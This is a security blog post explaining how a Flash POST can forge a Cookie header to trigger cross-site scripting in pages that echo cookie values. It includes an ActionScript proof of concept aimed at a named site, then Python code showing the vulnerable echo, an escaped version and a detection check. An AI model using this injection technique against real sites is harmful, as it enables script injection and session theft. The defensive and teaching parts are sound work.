Well, after talking with David Ross about the last post (bypassing content-disposition), I found out that its exploitation wasn't as easy as it appeared, since IE has shipped some updates in the last couple of months.. so well.. sorry about that.
Anyway, I guess it's time to tell the world a little way of exploiting XSS vulnerabilities in pages that echo the value of a cookie.
This is based on majohn's trick (setting headers via a Flash POST), and well, I remembered it when I saw kuza's talk.
This is done via Flash:
class defconxss {
    static function main(mc) {
        var req = new LoadVars();
        // The whole "Cookie: name=value" line goes in the header name; the header value is just a space
        req.addRequestHeader("Cookie:bblastactivity=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E", " ");
        // Dummy POST variable
        req["1"] = "1";
        req.send("https://pics.defcon.org/misc.php?action=cookies", "_self", "POST");
    }
}
This is a PoC for an XSS at pics.defcon.org; you can read more about it here: http://whk.h4ck1ng.net/2007-12.22/xss-en-defconorg/ (but it's in Spanish).
An important thing to note is that cookies sent this way are not persistent by default; however, some code can force them to become persistent.
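The server-side bug behind this PoC is that the application percent-decodes a cookie value and writes it into the page unescaped. The following is an added example (not code from the original post or from the vBulletin-style site it targets) showing the vulnerable echo beside a hardened version, plus a simple request-side check a defender could run over logged Cookie headers. The header parsing, the page template and the sample cookie string are all constructed here for illustration; the sample value reuses the URL-encoded string from the Flash PoC above.

```python
import html
from urllib.parse import unquote

# Constructed sample Cookie request header (not captured traffic). The first
# cookie carries the same URL-encoded value as the Flash PoC above.
SAMPLE_COOKIE_HEADER = (
    "bblastactivity=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E; sessionid=abc123"
)


def parse_cookie_header(header):
    """Split a raw Cookie request header into {name: value}.

    Values are percent-decoded, as many web stacks do for cookies, which is
    exactly the step that turns %3Cscript%3E back into <script>.
    """
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if not name:
            continue
        cookies[name] = unquote(value) if sep else ""
    return cookies


def render_vulnerable(cookies):
    """Echo the cookie value straight into the HTML: the defect the PoC relies on."""
    return "<p>Last activity: %s</p>" % cookies.get("bblastactivity", "")


def render_hardened(cookies):
    """Same page, but the value is HTML-escaped before it reaches the markup,
    so a cookie set by a third-party Flash POST cannot inject script."""
    value = html.escape(cookies.get("bblastactivity", ""), quote=True)
    return "<p>Last activity: %s</p>" % value


def suspicious_cookie_values(cookies):
    """Return names of cookies whose decoded value contains markup characters.

    A browser never produces such a value for a timestamp-style cookie, so a
    hit in request logs is a useful detection signal for this kind of attack.
    """
    return sorted(
        name for name, value in cookies.items()
        if any(ch in value for ch in "<>\"'")
    )


if __name__ == "__main__":
    jar = parse_cookie_header(SAMPLE_COOKIE_HEADER)
    print("vulnerable:", render_vulnerable(jar))
    print("hardened:  ", render_hardened(jar))
    print("suspicious:", suspicious_cookie_values(jar))
```

Running the block prints the decoded `<script>` tag inside the vulnerable page and the `&lt;script&gt;` form inside the hardened one, and flags `bblastactivity` as the suspicious cookie. Note that the hardened renderer only fixes HTML-body context; a cookie value echoed inside an attribute or a script block needs the escaping appropriate to that context.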
So this works for me with the latest player: http://www.adobe.com/shockwave/download/
Anyway, Internet Explorer is not vulnerable.. damn..
You can download kuza's talk here: http://outpost.h3q.com/fnord/24c3-torrents/24c3-2212-en-unusual_web_bugs.mp4.torrent
Greetz!!